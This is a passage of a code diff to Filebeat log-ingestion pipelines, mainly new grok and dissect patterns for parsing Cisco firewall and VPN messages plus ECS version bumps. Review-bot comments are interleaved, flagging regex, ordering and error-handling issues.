%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338006'" field: "server.domain" + description: "338006" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338007'" field: "message" + description: "338007" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338008'" field: "message" + description: "338008" pattern: "Dynamic %{}ilter %{event.outcome} black%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - dissect: if: "ctx._temp_.cisco.message_id == '338101'" field: "message" + description: "338101" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to 
%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}" - set: if: "ctx._temp_.cisco.message_id == '338101'" field: "server.domain" + description: "338101" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338102'" field: "message" + description: "338102" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}" - set: if: "ctx._temp_.cisco.message_id == '338102'" field: "server.domain" + description: "338102" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338103'" field: "message" + description: "338103" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338104'" field: "message" + description: "338104" pattern: "Dynamic %{}ilter %{event.outcome} white%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} 
(%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{}" - dissect: if: "ctx._temp_.cisco.message_id == '338201'" field: "message" + description: "338201" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338201'" field: "server.domain" + description: "338201" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338202'" field: "message" + description: "338202" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338202'" field: "server.domain" + description: "338202" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338203'" field: "message" + description: "338203" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to 
%{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}source %{} resolved from %{_temp_.cisco.list_id} list: %{source.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338203'" field: "server.domain" + description: "338203" value: "{{source.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338204'" field: "message" + description: "338204" pattern: "Dynamic %{}ilter %{event.outcome} grey%{}d %{network.transport} traffic from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})%{}destination %{} resolved from %{_temp_.cisco.list_id} list: %{destination.domain}, threat-level: %{_temp_.cisco.threat_level}, category: %{_temp_.cisco.threat_category}" - set: if: "ctx._temp_.cisco.message_id == '338204'" field: "server.domain" + description: "338204" value: "{{destination.domain}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '338301'" field: "message" + description: "338301" pattern: "Intercepted DNS reply for domain %{source.domain} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, matched %{_temp_.cisco.list_id}" - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "client.address" + description: "338301" value: "{{destination.address}}" ignore_empty_value: true - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "client.port" + description: "338301" value: "{{destination.port}}" ignore_empty_value: true - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "server.address" + description: "338301" 
value: "{{source.address}}" ignore_empty_value: true - set: if: "ctx._temp_.cisco.message_id == '338301'" field: "server.port" + description: "338301" value: "{{source.port}}" ignore_empty_value: true - dissect: if: "ctx._temp_.cisco.message_id == '502103'" field: "message" + description: "502103" pattern: "User priv level changed: Uname: %{host.user.name} 
From: %{_temp_.cisco.privilege.old} To: %{_temp_.cisco.privilege.new}" - append: if: "ctx._temp_.cisco.message_id == '502103'" field: "event.type" + description: "502103" value: - "group" - "change" - append: if: "ctx._temp_.cisco.message_id == '502103'" field: "event.category" + description: "502103" value: "iam" - dissect: if: "ctx._temp_.cisco.message_id == '507003'" field: "message" + description: "507003" pattern: "%{network.transport} flow from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} terminated by inspection engine, reason - %{message}" - dissect: if: '["605004", "605005"].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "605004, 605005" pattern: 'Login %{event.outcome} from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{network.protocol} for user "%{source.user.name}"' - dissect: if: "ctx._temp_.cisco.message_id == '609001'" field: "message" + description: "609001" pattern: "Built local-host %{_temp_.cisco.source_interface}:%{source.address}" - dissect: if: "ctx._temp_.cisco.message_id == '609002'" field: "message" + description: "609002" pattern: "Teardown local-host %{_temp_.cisco.source_interface}:%{source.address} duration %{_temp_.duration_hms}" - dissect: if: '["611102", "611101"].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "611102, 611101" pattern: 'User authentication %{event.outcome}: IP address: %{source.address}, Uname: %{host.user.name}' - dissect: if: "ctx._temp_.cisco.message_id == '710003'" field: "message" + description: "710003" pattern: "%{network.transport} access denied by ACL from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '710005'" field: "message" + description: "710005" pattern: "%{network.transport} request 
discarded from %{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" - dissect: if: "ctx._temp_.cisco.message_id == '713049'" field: "message" + description: "713049" pattern: "Group = %{}, IP = %{source.address}, Security negotiation complete for LAN-to-LAN Group (%{}) %{}, Inbound SPI = %{}, Outbound SPI = %{}" - - dissect: + - grok: if: "ctx._temp_.cisco.message_id == '716002'" field: "message" - pattern: "Group %{} User %{source.user.name} IP %{source.address} WebVPN session terminated: %{event.reason}" - - dissect: + description: "716002" + patterns: + - "Group <%{NOTSPACE:_temp_.cisco.webvpn.group_name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> WebVPN session terminated: %{GREEDYDATA:event.reason}." + - "Group %{NOTSPACE:_temp_.cisco.webvpn.group_name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} WebVPN session terminated: %{GREEDYDATA:event.reason}." + - grok: if: "ctx._temp_.cisco.message_id == '722051'" field: "message" - pattern: "Group %{} User %{source.user.name} IP %{source.address} IPv4 Address %{_temp_.cisco.assigned_ip} %{}" + description: "722051" + patterns: + - "Group <%{NOTSPACE:_temp_.cisco.webvpn.group_name}> User <%{NOTSPACE:source.user.name}> IP <%{IP:source.address}> IPv4 Address <%{IP:_temp_.cisco.assigned_ip}> %{GREEDYDATA}" + - "Group %{NOTSPACE:_temp_.cisco.webvpn.group_name} User %{NOTSPACE:source.user.name} IP %{IP:source.address} IPv4 Address %{IP:_temp_.cisco.assigned_ip} %{GREEDYDATA}" - dissect: if: "ctx._temp_.cisco.message_id == '733100'" field: "message" + description: "733100" pattern: "[%{_temp_.cisco.burst.object}] drop %{_temp_.cisco.burst.id} exceeded. 
Current burst rate is %{_temp_.cisco.burst.current_rate} per second, max configured rate is %{_temp_.cisco.burst.configured_rate}; Current average rate is %{_temp_.cisco.burst.avg_rate} per second, max configured rate is %{_temp_.cisco.burst.configured_avg_rate}; Cumulative total count is %{_temp_.cisco.burst.cumulative_count}" - dissect: if: "ctx._temp_.cisco.message_id == '734001'" field: "message" + description: "734001" pattern: "DAP: User %{user.email}, Addr %{source.address}, Connection %{_temp_.cisco.connection_type}: The following DAP records were selected for this connection: %{_temp_.cisco.dap_records->}" - dissect: if: "ctx._temp_.cisco.message_id == '805001'" field: "message" + description: "805001" pattern: "Offloaded %{network.transport} for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - dissect: if: "ctx._temp_.cisco.message_id == '805002'" field: "message" + description: "805002" pattern: "%{network.transport} Flow is no longer offloaded for connection %{_temp_.cisco.connection_id} from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} (%{_temp_.natsrcip}/%{_temp_.cisco.mapped_source_port}) to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} (%{_temp_.natdstip}/%{_temp_.cisco.mapped_destination_port})" - split: field: "_temp_.cisco.dap_records" 
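Review bot: Both new 716002 grok patterns end in an unescaped `.` after `%{GREEDYDATA:event.reason}`, which matches any character rather than a literal period, so a message without a trailing period still matches and `event.reason` silently loses its last character. Ending them with `%{DATA:event.reason}\\.?$` (backslash doubled because the scalar is double-quoted) would keep the reason intact with or without the period. In the 302020 pattern the optional interface before both `faddr` and `laddr` is captured into `_temp_.cisco.source_interface` while the faddr address goes to `destination.*`; the faddr side looks like it should be `_temp_.cisco.destination_interface`, though the Teardown faddr pattern in the next hunk uses the same naming, so confirm which is intended. The 716002 and 722051 patterns also use `%{NOTSPACE}` for group and user names, so a name containing a space would fail the match; a sample log line covering that case would show whether VPN session events can go unparsed.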
@@ -584,12 +685,19 @@ processors: if: '["302012", "302014", "302016", "302018", "302020", "302021", "302036", "302304", "302306", "609001", "609002"].contains(ctx._temp_.cisco.message_id)' field: "event.action" value: "flow-expiration" + description: "302012, 302014, 302016, 302018, 302020, 302021, 302036, 302304, 302306, 609001, 609002" - grok: field: "message" if: '["302014", "302016", "302018", "302021", "302036", "302304", "302306"].contains(ctx._temp_.cisco.message_id)' + description: "302014, 302016, 302018, 302021, 302036, 302304, 302306" patterns: - - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?(?:duration %{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes:int})%{GREEDYDATA} - - Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:%{NOTSPACE:_temp_.cisco.source_username})?%{GREEDYDATA} + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from 
%{NOTCOLON:_temp_.cisco.termination_initiator} \(%{NOTSPACE:_temp_.cisco.termination_user}\) + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} \(%{NOTSPACE:_temp_.cisco.termination_user}\) + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) \(%{NOTSPACE:_temp_.cisco.termination_user}\) + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) 
%{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} + - Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.source_username} )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:%{NOTSPACE:_temp_.cisco.destination_username} )?duration (?:%{TIME:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) + - Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(%{NOTSPACE:_temp_.cisco.destination_username}\) )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{NOTSPACE:_temp_.cisco.source_username}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? pattern_definitions: NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -606,6 +714,7 @@ processors: - kv: if: '["430001", "430002", "430003", "430004", "430005", ""].contains(ctx._temp_.cisco.message_id)' field: "message" + description: "430001, 430002, 430003, 430004, 430005" field_split: ",(?=[A-za-z1-9\\s]+:)" value_split: ":" target_field: "_temp_.orig_security" 
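Review bot: The six new `Teardown … duration` alternatives only work in their current order, and nothing in the hunk records that. As far as I can tell these grok patterns are unanchored, so the last, duration-only alternative also matches every line the five more specific ones are meant to catch. If a later edit reorders them, `event.reason`, `_temp_.cisco.termination_initiator` and `_temp_.cisco.termination_user` would stop being populated without any processor failure. I would add a comment above `patterns:` such as `# Keep most-specific suffix first: patterns are unanchored, so the duration-only form matches all lines above it`. The same long prefix is also repeated six times, so any fix to it has to be made in every copy; the `pattern_definitions` block continues past the end of the hunk.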
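Review bot: The added `description` on the `kv` processor lists five message IDs, but the `if` above it also accepts the empty string (`""` is the sixth entry in the list). Events with an empty message ID therefore reach this processor too, and the description should say so, e.g. `description: "430001, 430002, 430003, 430004, 430005, or empty message_id"`. Separately, and not introduced by this change, the `field_split` look-ahead class `[A-za-z1-9\\s]` includes the punctuation between `Z` and `a` and leaves out `0`. If that is unintended, `[A-Za-z0-9\\s]` is the usual form. The processor's remaining options lie outside the hunk.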
@@ -1238,7 +1347,7 @@ processors: value: "ipv6-icmp" # - # Convert integer fields, as output of dissect and kv processors is always a string + # Convert numeric fields to integer or long, as output of dissect and kv processors is always a string # - convert: field: "source.port" @@ -1250,11 +1359,15 @@ processors: ignore_failure: true - convert: field: "source.bytes" - type: integer + type: long ignore_failure: true - convert: field: "destination.bytes" - type: integer + type: long + ignore_failure: true + - convert: + field: "network.bytes" + type: long ignore_failure: true - convert: field: "source.packets" @@ -1614,15 +1727,25 @@ processors: value: "{{source.ip}}" if: "ctx?.source?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{source.nat.ip}}" + if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{destination.nat.ip}}" + if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}" - if: "ctx?.user?.name != null && ctx?.user?.name != ''" + if: ctx?.user?.name != null && ctx?.user?.name != '' allow_duplicates: false - append: field: related.user @@ -1637,8 +1760,8 @@ processors: - append: field: related.user value: "{{destination.user.name}}" + if: ctx?.destination?.user?.name != null && ctx?.destination?.user?.name != '' allow_duplicates: false - if: "ctx?.destination?.user?.name != null" - append: field: related.hash value: "{{file.hash.sha256}}" diff --git a/x-pack/filebeat/module/cisco/umbrella/config/input.yml b/x-pack/filebeat/module/cisco/umbrella/config/input.yml index d2da78cc349..0e81d3eab78 100644 --- a/x-pack/filebeat/module/cisco/umbrella/config/input.yml +++ b/x-pack/filebeat/module/cisco/umbrella/config/input.yml 
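Review bot: The new `network.bytes` convert uses `ignore_failure: true`, so a value that does not parse as a long stays on the event as a string and leaves no trace. The Teardown grok earlier in this change now captures `network.bytes` without the `:int` suffix, which makes this convert the only typing step visible for that field. Consider replacing `ignore_failure: true` here with a handler that records the problem, for example `on_failure: [{append: {field: error.message, value: "{{ _ingest.on_failure_message }}"}}]`, so mistyped byte counts can be found later. The `source.bytes` and `destination.bytes` converts in the same hunk follow the same pattern and would benefit equally.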
@@ -22,4 +22,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/coredns/log/config/coredns.yml b/x-pack/filebeat/module/coredns/log/config/coredns.yml index 162208f2e80..0b63ac697fa 100644 --- a/x-pack/filebeat/module/coredns/log/config/coredns.yml +++ b/x-pack/filebeat/module/coredns/log/config/coredns.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml index de7c32e3d3b..9550bbc6ea7 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/config/falcon.yml @@ -30,4 +30,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cyberark/corepas/config/input.yml b/x-pack/filebeat/module/cyberark/corepas/config/input.yml index 49b1e4ef20b..9136df99056 100644 --- a/x-pack/filebeat/module/cyberark/corepas/config/input.yml +++ b/x-pack/filebeat/module/cyberark/corepas/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json b/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json index 85e28bf8beb..ca6998d7db6 100644 --- a/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json +++ b/x-pack/filebeat/module/cyberark/corepas/test/generated.log-expected.json 
@@ -64,17 +64,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.259", "related.hosts": [ - "volup208.invalid", - "iatnu3810.mail.localdomain" + "iatnu3810.mail.localdomain", + "volup208.invalid" ], "related.ip": [ "10.92.136.230", "10.175.75.18" ], "related.user": [ - "dolore", "nnumqu", - "orev" + "orev", + "dolore" ], "rsa.db.database": "umdo", "rsa.db.index": "vol", @@ -131,17 +131,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.7269", "related.hosts": [ - "anti4454.api.example", - "tetu5280.www5.invalid" + "tetu5280.www5.invalid", + "anti4454.api.example" ], "related.ip": [ "10.51.132.10", "10.46.185.46" ], "related.user": [ - "incid", + "serror", "nse", - "serror" + "incid" ], "rsa.db.database": "byC", "rsa.db.index": "tur", @@ -206,8 +206,8 @@ "10.155.236.240" ], "related.user": [ - "atcup", "ptass", + "atcup", "psumquia" ], "rsa.db.database": "aperi", @@ -265,8 +265,8 @@ "10.81.199.122" ], "related.user": [ - "giatq", "oremips", + "giatq", "eos" ], "rsa.db.index": "tempo", @@ -317,9 +317,9 @@ "10.172.14.142" ], "related.user": [ - "aboris", "tcupida", - "uam" + "uam", + "aboris" ], "rsa.db.database": "isiu", "rsa.db.index": "iatisu", @@ -376,17 +376,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.6875", "related.hosts": [ - "tenbyCic5882.api.home", - "amquisno3338.www5.lan" + "amquisno3338.www5.lan", + "tenbyCic5882.api.home" ], "related.ip": [ - "10.104.111.129", - "10.47.76.251" + "10.47.76.251", + "10.104.111.129" ], "related.user": [ + "etconsec", "ipis", - "ele", - "etconsec" + "ele" ], "rsa.db.database": "riat", "rsa.db.index": "umdolor", @@ -443,9 +443,9 @@ "10.116.120.216" ], "related.user": [ - "quiratio", "umdo", - "animi" + "animi", + "quiratio" ], "rsa.db.index": "oll", "rsa.internal.event_desc": "rumet", 
@@ -487,17 +487,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.5529", "related.hosts": [ - "idolores3839.localdomain", - "isqu7224.localdomain" + "isqu7224.localdomain", + "idolores3839.localdomain" ], "related.ip": [ - "10.62.54.220", - "10.57.40.29" + "10.57.40.29", + "10.62.54.220" ], "related.user": [ - "taevi", + "rnatura", "psum", - "rnatura" + "taevi" ], "rsa.db.database": "emeumfug", "rsa.db.index": "omn", @@ -553,8 +553,8 @@ "10.74.237.180" ], "related.user": [ - "cup", "tnon", + "cup", "ema" ], "rsa.db.index": "remeumf", @@ -597,9 +597,9 @@ "10.18.165.35" ], "related.user": [ - "remeum", "modocons", - "lor" + "lor", + "remeum" ], "rsa.db.index": "etM", "rsa.internal.event_desc": "etc", @@ -793,9 +793,9 @@ "10.18.109.121" ], "related.user": [ - "pida", + "hil", "tatn", - "hil" + "pida" ], "rsa.db.index": "quip", "rsa.internal.event_desc": "ecillu", @@ -837,16 +837,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.3727", "related.hosts": [ - "rpo79.mail.example", - "iavolu5352.localhost" + "iavolu5352.localhost", + "rpo79.mail.example" ], "related.ip": [ "10.63.37.192", "10.225.115.13" ], "related.user": [ - "reetd", "equep", + "reetd", "iunt" ], "rsa.db.database": "aliqu", @@ -903,17 +903,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.3219", "related.hosts": [ - "tionof7613.domain", - "estiae3750.api.corp" + "estiae3750.api.corp", + "tionof7613.domain" ], "related.ip": [ "10.95.64.124", "10.47.202.102" ], "related.user": [ - "run", + "ntor", "ice", - "ntor" + "run" ], "rsa.db.database": "ite", "rsa.db.index": "iquipex", @@ -969,16 +969,16 @@ "observer.vendor": "Cyberark", "observer.version": "1.6371", "related.hosts": [ - "acc7692.home", - "aquaeabi7735.internal.lan" + "aquaeabi7735.internal.lan", + "acc7692.home" ], "related.ip": [ "10.244.114.61", "10.106.239.55" ], "related.user": [ - "serunt", - "itquiin" + "itquiin", + "serunt" ], "rsa.db.database": "itame", "rsa.db.index": "oluptas", 
@@ -1034,17 +1034,17 @@ "observer.vendor": "Cyberark", "observer.version": "1.821", "related.hosts": [ - "etMalor4236.www5.host", - "quatD4191.local" + "quatD4191.local", + "etMalor4236.www5.host" ], "related.ip": [ - "10.53.168.235", - "10.125.160.129" + "10.125.160.129", + "10.53.168.235" ], "related.user": [ - "ione", "one", - "abi" + "abi", + "ione" ], "rsa.db.database": "sperna", "rsa.db.index": "estia", @@ -1109,9 +1109,9 @@ "10.227.177.121" ], "related.user": [ + "liqui", "tasuntex", - "iduntu", - "liqui" + "iduntu" ], "rsa.db.database": "rvel", "rsa.db.index": "onsecte", @@ -1180,8 +1180,8 @@ "10.167.85.181" ], "related.user": [ - "econs", - "fde" + "fde", + "econs" ], "rsa.db.database": "equat", "rsa.internal.event_desc": "orpor", @@ -1240,8 +1240,8 @@ ], "related.user": [ "icabo", - "sintoc", - "iciadese" + "iciadese", + "sintoc" ], "rsa.db.index": "eni", "rsa.internal.event_desc": "rcitati", @@ -1287,13 +1287,13 @@ "nevo4284.internal.local" ], "related.ip": [ - "10.72.148.32", - "10.214.191.180" + "10.214.191.180", + "10.72.148.32" ], "related.user": [ "uteirure", - "tDuisaut", - "luptatev" + "luptatev", + "tDuisaut" ], "rsa.db.database": "uamest", "rsa.db.index": "uae", @@ -1350,12 +1350,12 @@ "observer.vendor": "Cyberark", "observer.version": "1.3599", "related.hosts": [ - "itas981.mail.domain", - "mporin6932.api.localdomain" + "mporin6932.api.localdomain", + "itas981.mail.domain" ], "related.ip": [ - "10.252.124.150", - "10.136.190.236" + "10.136.190.236", + "10.252.124.150" ], "related.user": [ "com", @@ -1421,8 +1421,8 @@ "illoin2914.mail.lan" ], "related.ip": [ - "10.192.34.76", - "10.213.144.249" + 